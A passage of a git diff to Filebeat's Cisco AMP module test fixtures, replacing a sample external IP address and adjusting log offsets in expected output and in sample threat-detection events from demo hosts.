         "@timestamp": "2021-01-15T10:18:57.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2117,7 +2075,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 52696,
+        "log.offset": 52846,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2128,7 +2086,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2144,7 +2102,7 @@
         "@timestamp": "2021-01-15T10:18:25.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2182,7 +2140,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 54015,
+        "log.offset": 54170,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2193,7 +2151,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2205,7 +2163,7 @@
         "@timestamp": "2021-01-15T10:18:13.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2243,7 +2201,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 55334,
+        "log.offset": 55494,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2254,7 +2212,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2266,7 +2224,7 @@
         "@timestamp": "2021-01-15T10:18:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2304,7 +2262,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 56653,
+        "log.offset": 56818,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2315,7 +2273,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2327,7 +2285,7 @@
         "@timestamp": "2021-01-15T10:17:58.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2368,7 +2326,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 57972,
+        "log.offset": 58142,
         "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e",
         "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
         "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
@@ -2384,7 +2342,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2400,7 +2358,7 @@
         "@timestamp": "2021-01-15T10:17:57.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2440,7 +2398,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 59570,
+        "log.offset": 59745,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2451,7 +2409,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2467,7 +2425,7 @@
         "@timestamp": "2021-01-15T10:17:57.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2505,7 +2463,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 60896,
+        "log.offset": 61076,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2516,7 +2474,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2532,7 +2490,7 @@
         "@timestamp": "2021-01-15T10:17:57.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2570,7 +2528,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 62215,
+        "log.offset": 62400,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2581,7 +2539,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2597,7 +2555,7 @@
         "@timestamp": "2021-01-15T10:17:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2635,7 +2593,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 63534,
+        "log.offset": 63724,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2646,7 +2604,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2658,7 +2616,7 @@
         "@timestamp": "2021-01-15T10:17:41.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2692,7 +2650,7 @@
         "host.hostname": "Demo_TeslaCrypt",
         "host.name": "Demo_TeslaCrypt",
         "input.type": "log",
-        "log.offset": 64851,
+        "log.offset": 65046,
         "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
         "related.hash": [
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"
@@ -2702,7 +2660,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2714,7 +2672,7 @@
         "@timestamp": "2021-01-15T10:17:39.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2752,7 +2710,7 @@
         "host.hostname": "Demo_TeslaCrypt",
         "host.name": "Demo_TeslaCrypt",
         "input.type": "log",
-        "log.offset": 66143,
+        "log.offset": 66343,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -2763,7 +2721,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log
index 4a0581fcd4d6..5552e4f10765 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log
@@ -1,45 +1,45 @@
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
